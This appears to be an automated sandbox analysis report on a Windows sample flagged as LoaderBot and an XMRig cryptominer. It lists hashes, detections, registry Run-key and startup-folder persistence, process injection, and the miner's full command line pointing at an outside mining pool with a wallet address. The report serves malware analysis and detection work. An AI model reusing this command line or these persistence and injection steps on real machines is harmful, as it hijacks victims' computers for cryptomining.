Analysis
-
max time kernel
124s -
max time network
146s -
platform
windows10-2004_x64 -
resource
win10v2004-20230220-en -
resource tags
arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system -
submitted
23-05-2023 15:51
Static task
static1
Behavioral task
behavioral1
Sample
e7bf9f0c2c1977ddd8e139c13c27be0d.exe
Resource
win7-20230220-en
Behavioral task
behavioral2
Sample
e7bf9f0c2c1977ddd8e139c13c27be0d.exe
Resource
win10v2004-20230220-en
General
-
Target
e7bf9f0c2c1977ddd8e139c13c27be0d.exe
-
Size
2.7MB
-
MD5
e7bf9f0c2c1977ddd8e139c13c27be0d
-
SHA1
e91aff3d9a8c7cef0e9543350864971e4ad93f82
-
SHA256
a615a2c647bce3b67f43c818a7fd972a653a605efce83b7eb6f38fb374ec8eba
-
SHA512
d9961824b178944aec2411c1bb29a5ef4b487ce0c251fe381e2841c6abe00f29ecf895ab1baf93e49442af07a14acdcf9d882519d39beb5c4d4902db2db2560f
-
SSDEEP
49152:552sxwTr/VsoJteujcnqNwelN/z52r7zj9n0cqv/3SYd:55jxa3JteujcncNNQzj9hqXCY
Malware Config
Signatures
-
LoaderBot executable 1 IoCs
resource yara_rule behavioral2/memory/4252-141-0x0000000000400000-0x00000000007FE000-memory.dmp loaderbot -
XMRig Miner payload 14 IoCs
resource yara_rule behavioral2/memory/2924-159-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral2/memory/2924-160-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral2/memory/4672-163-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral2/memory/4672-165-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral2/memory/4672-167-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral2/memory/4672-168-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral2/memory/4672-169-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral2/memory/4672-172-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral2/memory/4672-175-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral2/memory/4672-176-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral2/memory/4672-177-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral2/memory/4672-178-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral2/memory/4672-179-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral2/memory/4672-180-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\Control Panel\International\Geo\Nation e7bf9f0c2c1977ddd8e139c13c27be0d.exe -
Drops startup file 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Driver.url e7bf9f0c2c1977ddd8e139c13c27be0d.exe -
Executes dropped EXE 2 IoCs
pid Process 2924 Driver.exe 4672 Driver.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Driver = "C:\\Users\\Admin\\AppData\\Roaming\\Sysfiles\\e7bf9f0c2c1977ddd8e139c13c27be0d.exe" e7bf9f0c2c1977ddd8e139c13c27be0d.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 4500 set thread context of 4252 4500 e7bf9f0c2c1977ddd8e139c13c27be0d.exe 87 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 2464 2924 WerFault.exe 88 -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4500 e7bf9f0c2c1977ddd8e139c13c27be0d.exe 4500 e7bf9f0c2c1977ddd8e139c13c27be0d.exe 4500 e7bf9f0c2c1977ddd8e139c13c27be0d.exe 4500 e7bf9f0c2c1977ddd8e139c13c27be0d.exe 4500 e7bf9f0c2c1977ddd8e139c13c27be0d.exe 4500 e7bf9f0c2c1977ddd8e139c13c27be0d.exe 4252 e7bf9f0c2c1977ddd8e139c13c27be0d.exe 4252 e7bf9f0c2c1977ddd8e139c13c27be0d.exe 4252 e7bf9f0c2c1977ddd8e139c13c27be0d.exe 4252 e7bf9f0c2c1977ddd8e139c13c27be0d.exe 4252 e7bf9f0c2c1977ddd8e139c13c27be0d.exe 4252 e7bf9f0c2c1977ddd8e139c13c27be0d.exe 4252 e7bf9f0c2c1977ddd8e139c13c27be0d.exe 4252 e7bf9f0c2c1977ddd8e139c13c27be0d.exe 4252 e7bf9f0c2c1977ddd8e139c13c27be0d.exe 4252 e7bf9f0c2c1977ddd8e139c13c27be0d.exe 4252 e7bf9f0c2c1977ddd8e139c13c27be0d.exe 4252 e7bf9f0c2c1977ddd8e139c13c27be0d.exe 4252 e7bf9f0c2c1977ddd8e139c13c27be0d.exe 4252 e7bf9f0c2c1977ddd8e139c13c27be0d.exe 4252 e7bf9f0c2c1977ddd8e139c13c27be0d.exe 4252 e7bf9f0c2c1977ddd8e139c13c27be0d.exe 4252 e7bf9f0c2c1977ddd8e139c13c27be0d.exe 4252 e7bf9f0c2c1977ddd8e139c13c27be0d.exe 4252 e7bf9f0c2c1977ddd8e139c13c27be0d.exe 4252 e7bf9f0c2c1977ddd8e139c13c27be0d.exe 4252 e7bf9f0c2c1977ddd8e139c13c27be0d.exe 4252 e7bf9f0c2c1977ddd8e139c13c27be0d.exe 4252 e7bf9f0c2c1977ddd8e139c13c27be0d.exe 4252 e7bf9f0c2c1977ddd8e139c13c27be0d.exe 4252 e7bf9f0c2c1977ddd8e139c13c27be0d.exe 4252 e7bf9f0c2c1977ddd8e139c13c27be0d.exe 4252 e7bf9f0c2c1977ddd8e139c13c27be0d.exe 4252 e7bf9f0c2c1977ddd8e139c13c27be0d.exe 4252 e7bf9f0c2c1977ddd8e139c13c27be0d.exe 4252 e7bf9f0c2c1977ddd8e139c13c27be0d.exe 4252 e7bf9f0c2c1977ddd8e139c13c27be0d.exe 4252 e7bf9f0c2c1977ddd8e139c13c27be0d.exe 4252 e7bf9f0c2c1977ddd8e139c13c27be0d.exe 4252 e7bf9f0c2c1977ddd8e139c13c27be0d.exe 4252 e7bf9f0c2c1977ddd8e139c13c27be0d.exe 4252 e7bf9f0c2c1977ddd8e139c13c27be0d.exe 4252 e7bf9f0c2c1977ddd8e139c13c27be0d.exe 4252 e7bf9f0c2c1977ddd8e139c13c27be0d.exe 4252 e7bf9f0c2c1977ddd8e139c13c27be0d.exe 4252 e7bf9f0c2c1977ddd8e139c13c27be0d.exe 4252 e7bf9f0c2c1977ddd8e139c13c27be0d.exe 4252 e7bf9f0c2c1977ddd8e139c13c27be0d.exe 4252 e7bf9f0c2c1977ddd8e139c13c27be0d.exe 4252 e7bf9f0c2c1977ddd8e139c13c27be0d.exe 4252 e7bf9f0c2c1977ddd8e139c13c27be0d.exe 4252 e7bf9f0c2c1977ddd8e139c13c27be0d.exe 4252 e7bf9f0c2c1977ddd8e139c13c27be0d.exe 4252 e7bf9f0c2c1977ddd8e139c13c27be0d.exe 4252 e7bf9f0c2c1977ddd8e139c13c27be0d.exe 4252 e7bf9f0c2c1977ddd8e139c13c27be0d.exe 4252 e7bf9f0c2c1977ddd8e139c13c27be0d.exe 4252 e7bf9f0c2c1977ddd8e139c13c27be0d.exe 4252 e7bf9f0c2c1977ddd8e139c13c27be0d.exe 4252 e7bf9f0c2c1977ddd8e139c13c27be0d.exe 4252 e7bf9f0c2c1977ddd8e139c13c27be0d.exe 4252 e7bf9f0c2c1977ddd8e139c13c27be0d.exe 4252 e7bf9f0c2c1977ddd8e139c13c27be0d.exe 4252 e7bf9f0c2c1977ddd8e139c13c27be0d.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 652 Process not Found -
Suspicious behavior: RenamesItself 1 IoCs
pid Process 4252 e7bf9f0c2c1977ddd8e139c13c27be0d.exe -
Suspicious use of AdjustPrivilegeToken 6 IoCs
description pid Process Token: SeDebugPrivilege 4500 e7bf9f0c2c1977ddd8e139c13c27be0d.exe Token: SeDebugPrivilege 4252 e7bf9f0c2c1977ddd8e139c13c27be0d.exe Token: SeLockMemoryPrivilege 2924 Driver.exe Token: SeLockMemoryPrivilege 2924 Driver.exe Token: SeLockMemoryPrivilege 4672 Driver.exe Token: SeLockMemoryPrivilege 4672 Driver.exe -
Suspicious use of WriteProcessMemory 21 IoCs
description pid Process procid_target PID 4500 wrote to memory of 3972 4500 e7bf9f0c2c1977ddd8e139c13c27be0d.exe 84 PID 4500 wrote to memory of 3972 4500 e7bf9f0c2c1977ddd8e139c13c27be0d.exe 84 PID 4500 wrote to memory of 3972 4500 e7bf9f0c2c1977ddd8e139c13c27be0d.exe 84 PID 4500 wrote to memory of 232 4500 e7bf9f0c2c1977ddd8e139c13c27be0d.exe 85 PID 4500 wrote to memory of 232 4500 e7bf9f0c2c1977ddd8e139c13c27be0d.exe 85 PID 4500 wrote to memory of 232 4500 e7bf9f0c2c1977ddd8e139c13c27be0d.exe 85 PID 4500 wrote to memory of 2608 4500 e7bf9f0c2c1977ddd8e139c13c27be0d.exe 86 PID 4500 wrote to memory of 2608 4500 e7bf9f0c2c1977ddd8e139c13c27be0d.exe 86 PID 4500 wrote to memory of 2608 4500 e7bf9f0c2c1977ddd8e139c13c27be0d.exe 86 PID 4500 wrote to memory of 4252 4500 e7bf9f0c2c1977ddd8e139c13c27be0d.exe 87 PID 4500 wrote to memory of 4252 4500 e7bf9f0c2c1977ddd8e139c13c27be0d.exe 87 PID 4500 wrote to memory of 4252 4500 e7bf9f0c2c1977ddd8e139c13c27be0d.exe 87 PID 4500 wrote to memory of 4252 4500 e7bf9f0c2c1977ddd8e139c13c27be0d.exe 87 PID 4500 wrote to memory of 4252 4500 e7bf9f0c2c1977ddd8e139c13c27be0d.exe 87 PID 4500 wrote to memory of 4252 4500 e7bf9f0c2c1977ddd8e139c13c27be0d.exe 87 PID 4500 wrote to memory of 4252 4500 e7bf9f0c2c1977ddd8e139c13c27be0d.exe 87 PID 4500 wrote to memory of 4252 4500 e7bf9f0c2c1977ddd8e139c13c27be0d.exe 87 PID 4252 wrote to memory of 2924 4252 e7bf9f0c2c1977ddd8e139c13c27be0d.exe 88 PID 4252 wrote to memory of 2924 4252 e7bf9f0c2c1977ddd8e139c13c27be0d.exe 88 PID 4252 wrote to memory of 4672 4252 e7bf9f0c2c1977ddd8e139c13c27be0d.exe 92 PID 4252 wrote to memory of 4672 4252 e7bf9f0c2c1977ddd8e139c13c27be0d.exe 92
Processes
-
C:\Users\Admin\AppData\Local\Temp\e7bf9f0c2c1977ddd8e139c13c27be0d.exe"C:\Users\Admin\AppData\Local\Temp\e7bf9f0c2c1977ddd8e139c13c27be0d.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4500 -
C:\Users\Admin\AppData\Local\Temp\e7bf9f0c2c1977ddd8e139c13c27be0d.exe"{path}"2⤵PID:3972
-
-
C:\Users\Admin\AppData\Local\Temp\e7bf9f0c2c1977ddd8e139c13c27be0d.exe"{path}"2⤵PID:232
-
-
C:\Users\Admin\AppData\Local\Temp\e7bf9f0c2c1977ddd8e139c13c27be0d.exe"{path}"2⤵PID:2608
-
-
C:\Users\Admin\AppData\Local\Temp\e7bf9f0c2c1977ddd8e139c13c27be0d.exe"{path}"2⤵
- Checks computer location settings
- Drops startup file
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4252 -
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 427X8guX5JRRGk4v7gRcwK85MwpjCAN7djGqBAbCETdqc5biVY27pePT3Ctx43QMLAdKAaRDF4KW4HiozmdQ7EHrNczdnfM -p x -k -v=0 --donate-level=1 -t 23⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2924 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2924 -s 7604⤵
- Program crash
PID:2464
-
-
-
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 427X8guX5JRRGk4v7gRcwK85MwpjCAN7djGqBAbCETdqc5biVY27pePT3Ctx43QMLAdKAaRDF4KW4HiozmdQ7EHrNczdnfM -p x -k -v=0 --donate-level=1 -t 23⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4672
-
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 416 -p 2924 -ip 29241⤵PID:1236
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\e7bf9f0c2c1977ddd8e139c13c27be0d.exe.log
Filesize1KB
MD517573558c4e714f606f997e5157afaac
SHA113e16e9415ceef429aaf124139671ebeca09ed23
SHA256c18db6aecad2436da4a63ff26af4e3a337cca48f01c21b8db494fe5ccc60e553
SHA512f4edf13f05a0d142e4dd42802098c8c44988ee8869621a62c2b565a77c9a95857f636583ff8d6d9baa366603d98b9bfbf1fc75bc6f9f8f83c80cb1215b2941cc
-
Filesize
3.9MB
MD502569a7a91a71133d4a1023bf32aa6f4
SHA10f16bcb3f3f085d3d3be912195558e9f9680d574
SHA2568d6abba9b216172cfc64b8802db0d20a1c634c96e1049f451eddba2363966bf0
SHA512534be1fe93ee556a14cfd8fad5377f57fb056ab4cd2bca14e4f376f4a25d3d4d270917d68a90b3c40d8a8daaeba6f592fa095ecff478332ba23405d1df728322
-
Filesize
3.9MB
MD502569a7a91a71133d4a1023bf32aa6f4
SHA10f16bcb3f3f085d3d3be912195558e9f9680d574
SHA2568d6abba9b216172cfc64b8802db0d20a1c634c96e1049f451eddba2363966bf0
SHA512534be1fe93ee556a14cfd8fad5377f57fb056ab4cd2bca14e4f376f4a25d3d4d270917d68a90b3c40d8a8daaeba6f592fa095ecff478332ba23405d1df728322
-
Filesize
3.9MB
MD502569a7a91a71133d4a1023bf32aa6f4
SHA10f16bcb3f3f085d3d3be912195558e9f9680d574
SHA2568d6abba9b216172cfc64b8802db0d20a1c634c96e1049f451eddba2363966bf0
SHA512534be1fe93ee556a14cfd8fad5377f57fb056ab4cd2bca14e4f376f4a25d3d4d270917d68a90b3c40d8a8daaeba6f592fa095ecff478332ba23405d1df728322
-
Filesize
3.9MB
MD502569a7a91a71133d4a1023bf32aa6f4
SHA10f16bcb3f3f085d3d3be912195558e9f9680d574
SHA2568d6abba9b216172cfc64b8802db0d20a1c634c96e1049f451eddba2363966bf0
SHA512534be1fe93ee556a14cfd8fad5377f57fb056ab4cd2bca14e4f376f4a25d3d4d270917d68a90b3c40d8a8daaeba6f592fa095ecff478332ba23405d1df728322